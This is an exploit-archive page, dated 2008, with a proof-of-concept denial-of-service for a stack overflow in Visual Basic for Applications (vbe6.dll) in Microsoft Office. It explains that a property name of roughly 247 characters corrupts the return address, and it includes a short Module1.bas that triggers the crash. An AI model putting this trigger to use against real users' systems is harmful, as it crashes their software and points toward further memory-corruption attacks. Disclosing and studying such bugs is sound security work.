Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS
# Published : 2008-03-30
# Author : Marsu
# Previous Title : MS Windows Explorer Unspecified .DOC File Denial of Service Exploit
# Next Title : PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit

Stack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application. 
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.

Probably impossible to exploit, but who knows? ^^ At least, there still exist stack overflows in Office apps :P

Marsu <Marsupilamipowa@hotmail.fr>

Module1.bas:

Attribute VB_Name = "Module1"

Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssade() As Variant
  
End Property

# www.Syue.com [2008-03-30]